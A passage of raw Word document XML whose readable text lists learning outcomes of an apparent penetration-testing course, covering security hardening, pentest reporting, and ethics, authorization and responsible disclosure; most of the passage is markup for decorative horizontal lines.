                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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15" name="Shape 8515"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="508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16" name="Shape 8516"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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17" name="Shape 8517"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="17780"/>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18" name="Shape 8518"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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796" style="width:451.48pt;height:1.64999pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57337,209">
                <v:shape id="Shape 8519" style="position:absolute;width:57308;height:190;left:0;top:0;" coordsize="5730875,19050" path="m0,0l5730875,0l5730875,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8520" style="position:absolute;width:91;height:91;left:3;top:19;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8521" style="position:absolute;width:57270;height:91;left:34;top:19;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8522" style="position:absolute;width:91;height:91;left:57306;top:19;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8523" style="position:absolute;width:91;height:127;left:3;top:50;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8524" style="position:absolute;width:91;height:127;left:57306;top:50;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8525" style="position:absolute;width:91;height:91;left:3;top:177;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8526" style="position:absolute;width:57270;height:91;left:34;top:177;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8527" style="position:absolute;width:91;height:91;left:57306;top:177;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A100F" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="229"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Security Remediation and Hardening Skills </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A66E086" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learn how to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>patch vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>reconfigure systems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>improve network design</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C03CB0" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get familiar with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>best practices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: firewalls, access controls, password policies, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E4F4C5" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="193"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build defense-in-depth strategies to prevent recurrence. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8EF253" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="197"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F03A17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>You don’t just break things—you learn how to fix and secure them.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF31BF1" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="-1" w:right="5"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74B253F1" wp14:editId="784B492C">
                <wp:extent cx="5733796" cy="21209"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7800" name="Group 7800"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5733796" cy="21209"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5733796" cy="21209"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="8530" name="Shape 8530"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>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1" name="Shape 8531"/>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2" name="Shape 8532"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="2159"/>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3" name="Shape 8533"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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4" name="Shape 8534"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318" y="5334"/>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35" name="Shape 8535"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="5334"/>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36" name="Shape 8536"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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37" name="Shape 8537"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="18034"/>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38" name="Shape 8538"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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800" style="width:451.48pt;height:1.66998pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57337,212">
                <v:shape id="Shape 8539" style="position:absolute;width:57308;height:190;left:0;top:0;" coordsize="5730875,19050" path="m0,0l5730875,0l5730875,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8540" style="position:absolute;width:91;height:91;left:3;top:21;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8541" style="position:absolute;width:57270;height:91;left:34;top:21;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8542" style="position:absolute;width:91;height:91;left:57306;top:21;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8543" style="position:absolute;width:91;height:127;left:3;top:53;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8544" style="position:absolute;width:91;height:127;left:57306;top:53;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8545" style="position:absolute;width:91;height:91;left:3;top:180;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8546" style="position:absolute;width:57270;height:91;left:34;top:180;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8547" style="position:absolute;width:91;height:91;left:57306;top:180;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5583B275" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="229"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reporting and Communication </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38621E67" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learn how to write </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>professional penetration testing reports</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27351E7A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Communicate clearly with both </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>technical teams</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>executives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDEE59E" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="193"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Make actionable and prioritized recommendations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BBA2F" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="197"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F03A17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>You develop soft skills like communication, documentation, and stakeholder alignment.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC28A78" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1" w:right="5"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B430A4D" wp14:editId="55EF2CC6">
                <wp:extent cx="5733796" cy="21907"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7801" name="Group 7801"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5733796" cy="21907"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5733796" cy="21907"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="8550" name="Shape 8550"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>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1" name="Shape 8551"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318" y="28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2" name="Shape 8552"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="2857"/>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3" name="Shape 8553"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="28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4" name="Shape 8554"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318" y="6032"/>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55" name="Shape 8555"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="6032"/>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56" name="Shape 8556"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318" y="187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57" name="Shape 8557"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="18732"/>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58" name="Shape 8558"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="187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801" style="width:451.48pt;height:1.72498pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57337,219">
                <v:shape id="Shape 8559" style="position:absolute;width:57308;height:190;left:0;top:0;" coordsize="5730875,19050" path="m0,0l5730875,0l5730875,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8560" style="position:absolute;width:91;height:91;left:3;top:28;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8561" style="position:absolute;width:57270;height:91;left:34;top:28;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8562" style="position:absolute;width:91;height:91;left:57306;top:28;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8563" style="position:absolute;width:91;height:127;left:3;top:60;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8564" style="position:absolute;width:91;height:127;left:57306;top:60;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8565" style="position:absolute;width:91;height:91;left:3;top:187;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8566" style="position:absolute;width:57270;height:91;left:34;top:187;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8567" style="position:absolute;width:91;height:91;left:57306;top:187;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7546FEEC" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="229"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ethical Hacking and Legal Boundaries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAEA210" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understand the importance of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>legal authorization and ethics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C233E" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Operate within clearly defined </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>scope and rules of engagement (RoE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0030DCCA" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="193"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learn responsible disclosure practices. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D92EDFF" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="197"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F03A17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>You understand how to be a responsible cybersecurity professional.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C14DD1" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="-1" w:right="5"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53958B0F" wp14:editId="2B04A434">
                <wp:extent cx="5733796" cy="20066"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6825" name="Group 6825"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5733796" cy="20066"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5733796" cy="20066"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="8570" name="Shape 8570"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>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1" name="Shape 8571"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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2" name="Shape 8572"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="1016"/>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3" name="Shape 8573"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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4" name="Shape 8574"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318" y="4191"/>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575" name="Shape 8575"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="4191"/>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76" name="Shape 8576"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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77" name="Shape 8577"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="16891"/>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578" name="Shape 8578"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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825" style="width:451.48pt;height:1.58002pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57337,200">
                <v:shape id="Shape 8579" style="position:absolute;width:57308;height:190;left:0;top:0;" coordsize="5730875,19050" path="m0,0l5730875,0l5730875,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8580" style="position:absolute;width:91;height:91;left:3;top:10;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8581" style="position:absolute;width:57270;height:91;left:34;top:10;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8582" style="position:absolute;width:91;height:91;left:57306;top:10;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8583" style="position:absolute;width:91;height:127;left:3;top:41;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8584" style="position:absolute;width:91;height:127;left:57306;top:41;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8585" style="position:absolute;width:91;height:91;left:3;top:168;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
